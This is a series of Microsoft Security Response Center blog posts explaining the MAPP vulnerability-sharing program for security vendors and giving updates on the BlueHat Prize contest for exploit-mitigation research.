Recently we have seen a fair amount of discussion around the MAPP program. We know that many customers and partners have questions about how MAPP works and how it helps protect customers, therefore I wanted to take this opportunity to explain how we work to facilitate the creation of active protections.

Our goal with MAPP is to have a transparent, effective program in place. As such, we routinely evaluate MAPP partners to ensure they are adhering to program guidelines, taking action to correct any partner deviations from our program charter. We are also continually looking to strengthen our technical and legal controls to help protect our customers.

Why the MAPP program?

Microsoft developed the MAPP program in 2008 in response to an increase in reverse-engineering occurring around our monthly security update releases. We recognized that there were many tools available that enabled security researchers and attackers alike to very quickly identify the root cause of a vulnerability, given the update binaries. We noted that defenders, such as antivirus or intrusion prevention vendors, were in a race against attackers to reverse-engineer our updates in order to create protection signatures.

Before the MAPP program, defenders were at a disadvantage because detecting exploits is difficult, especially if a security vendor does not have full information on the types of conditions that may trigger successful exploitation. A vendor could write a signature for every attack file they receive, but they would need to respond to every file individually, or spend significant amounts of time reverse-engineering our security updates themselves. By providing technical details about a vulnerability directly to defenders, we strengthen their ability to create more effective and accurate signatures in a shorter timeframe.

MAPP also helps to provide a first line of defense for customers who need, or want, to do their own testing prior to deploying our updates. Microsoft thoroughly tests security updates prior to release, however, we do not have the ability to test with all Line of Business applications that corporations develop in-house.

Given the fact that some customers prefer to perform in-house testing, which may delay installation of the security update, we sought partners that our customers had already deployed, and that could help protect against exploitation of software vulnerabilities. We found those partners in the anti-malware and intrusion prevention industries.

How does the MAPP program work?

Microsoft operates the MAPP program, free of charge, for security vendors that meet our minimum requirements on both the capability they have to protect customers and the number of customers they represent. One can find detailed information on our admission criteria here. We carefully vet and validate these criteria prior to admitting a new partner.

Each month, our team of security engineers work diligently to create information for our partners that helps them detect the exploitation of security vulnerabilities in our products. This data includes, but is not always limited to:

  • A detailed technical write-up on the vulnerability;
  • A step-by-step process that they can follow to parse an affected file format, or network protocol, that identifies which elements need to have particular values, or exceed specific boundaries, in order to trigger the security vulnerability;
  • Information on how to detect the vulnerability, or exploitation thereof (e.g. event log entries, or stack traces);
  • A Proof-of-Concept file that is in itself not malicious, but contains the specific condition that will trigger the vulnerability. Partners can leverage this file to test detection signatures they develop using the step-by-step process we provide.

We provide this information to participating vendors shortly in advance of the release of a security update. We base the timeframe on partners’ ability to release effective protections, while limiting the risk, should the information be inadvertently disclosed.

Once we provide the information, our engineers remain available to discuss, in detail, steps security vendors can take to detect exploitation of a vulnerability.

Our team also follows up with the partner vendors to better understand which vulnerabilities attackers are exploiting in the wild, and where we need to improve guidance to account for specific exploitation methods. We regularly update guidance after the initial release to help increase the ability of partners to protect customers.

How the MAPP program helps protect customers

The MAPP program helps vendors build comprehensive detection for vulnerabilities that Microsoft acknowledges or addresses in a security bulletin. MAPP partners are not permitted to release their protection in advance of the security update release.

For example, in the case of an Office exploit, our detection guidance will describe how to parse the Office file and validate which part of the file, and which elements, need to be malformed in order to trigger the vulnerability. Without MAPP data, vendors would – in many cases – need to “guess” which values could trigger a crash, and which could not, which reduces the effectiveness of their signatures.

Detection technology developed using MAPP data tends to be more accurate and more comprehensive than detection built without access to the information. Each month after the bulletin release, Microsoft follows up with each vendor individually to track the use of MAPP guidance across the signature base of our partners. When we identify that certain guidance is difficult to implement for our partner base, we work with partners to understand how we can improve the program and enable them to detect these threats more effectively.

The vulnerability addressed in MS10-087, CVE-2010-3333, is a good example. This particular issue affected our Rich Text Format (RTF) parser in Microsoft Office. Given that we had issued only a small number of bulletins for this particular component, many vendors did not have an effective way of parsing the file type. We worked with our MAPP vendors to develop a tool that would quickly identify malicious files, and distributed it to our partners, even though the issue had already been addressed in a security update.

Risks and limitations

We recognize that there is the potential for vulnerability information to be misused. In order to limit this as much as possible, we have strong non-disclosure agreements (NDAs) with our partners. Microsoft takes breaches of its NDAs very seriously. When partners do not successfully protect our intellectual property, we take action, which may include removing the partner from our program.

In addition, we make sure to only release data shortly in advance of the security update. Prior to MAPP, vendors released detection within hours to days following the release of a security update. Today, we send MAPP data to our partners just as far in advance as they need to get that work done, only now, the protection is usually available when we release the update.

But MAPP also has its limitations. For instance, MAPP does not protect against the exploitation of unknown, zero-day vulnerabilities. In order for MAPP to be effective, Microsoft must be aware of the vulnerability before it can distribute guidance to its MAPP partners.

Additionally, MAPP is only useful to the degree that a product can protect against exploitation of the vulnerability. Intrusion prevention vendors may not always be best-positioned to detect exploits for Office vulnerabilities, as the files may be encoded in a number of different ways across the network. In the same vein, host-based anti-malware products are often not best-positioned to protect against network-based exploits, such as the recent RDP vulnerability.

We recommend our customers work closely with their protection vendors to understand the abilities and limitations of each individual product.

The Value of MAPP

We believe that helping to strengthen community-based defense is key to protecting customers. The MAPP program provides a critical head-start to defenders, while working to minimize risk.

Microsoft is committed to helping customers by providing protection vendors across a wide variety of security industries with valuable protection information. The MAPP program is an important part of this strategy. While risk can never be completely eliminated, we believe the benefits of the program to our customers far outweigh the risks.



Maarten Van Horenbeeck
Senior Program Manager, Microsoft Security Response Center

BlueHat Prize entries: The final tally is…, 03 Apr 2012 17:54:00 +0000


The entries are in! After a last-minute wave of fresh entries to the first-ever BlueHat Prize, the final count for this year’s contest stands at twenty qualified proposals. The final entry reached our inboxes at 11:51pm on April 1. (Unfortunately, a contest entry that arrived 17 minutes later – at eight minutes after 11:59pm on April 2 – had to be disqualified out of fairness to the others, and to keep our competition in compliance with Washington State’s rules for such events.)


And now? Now begins the hard and exciting part – evaluating the received entries. The BlueHat Prize Board now starts the judging process, examining, testing and discussing each entry. We expect some lively arguments and look forward to introducing the competition winners to the world at Black Hat in July. In the meantime, we truly thank everyone who delivered a contest entry, as well as everyone who spent time thoughtfully considering the issue.


Talk to you in July –

Katie Moussouris

Senior Security Strategist, Microsoft Security Response Center.

Peace Games – BlueHat Prize Update and Countdown, 26 Mar 2012 11:55:00 +0000


In the film WarGames, an artificial intelligence program named Joshua asked the main character, a teenage hacker, the now famous question, “Shall we play a game?” When Microsoft announced the BlueHat Prize at the Black Hat Briefings in Las Vegas last summer, we asked a different question of the security researchers of the world, focused on defense.

Microsoft is offering over $250,000 in cash and prizes to security researchers who submit the best new security defense technology that meets the contest criteria. The top prize is $200,000 in cash, and the “mad loot” still could be yours!

With just under a week left in the entry period for the contest, which closes April 1, security researchers still have time to enter the competition to win the first and largest prize a vendor has offered for security defense research.

The ability to defeat the latest exploit mitigation technologies on various platforms is an extremely rare skill, as we have seen with several existing competitions that focus on vulnerability exploitation. Taking that knowledge to the level of helping to design new or enhanced mitigation technologies to help defend against exploit techniques like heapspray or Return Oriented Programming (ROP) was a challenge that we were hoping would garner at least as much interest.

The BlueHat Prize contest has exceeded our expectations for participation. So far we’ve had ten entries to the competition, the last four of which arrived over the past couple of weeks – an impressive showing, considering the difficulty of the problem we posed and the very small estimated number of individuals worldwide who possess the knowledge and expertise to seriously compete.

The entries cover a wide variety of ideas designed to help defend against different exploitation techniques, and it’s been great to see fresh insight into these technical areas. We’ve also been excited to see who the contestants are who have chosen to compete for the prize – some of them are security researchers with great track records in the security community, some are from academia, and some are from other venues altogether.

For those beautiful minds who have yet to enter their ideas for the contest, here are some highlights from the official rules:

– Complete entries must be received by midnight Pacific Time April 1, 2012.

– Complete entries must include a verbal description of the idea in English, as well as prototype code to show the exploit mitigation idea in action.

– For an entry to be valid, one of the criteria is that it should not be public at the time of entry (i.e., it must be new). However, a valid entry can be a new improvement on existing exploit mitigation techniques.

– If you have more questions, see the FAQ on the BlueHat Prize website or, if you don’t see your question answered there, contact the BlueHat Prize team.

With over $250,000 in cash and prizes on the line, we are excited that the first BlueHat Prize contest has already garnered great participation. One of my favorite quotes is from the great hockey player Wayne Gretzky, and it applies here for sure: “You miss 100% of the shots you don’t take.”

So, shall we play a game?

– Katie Moussouris

Senior Security Strategist, Microsoft Security Response Center

Follow Katie on Twitter.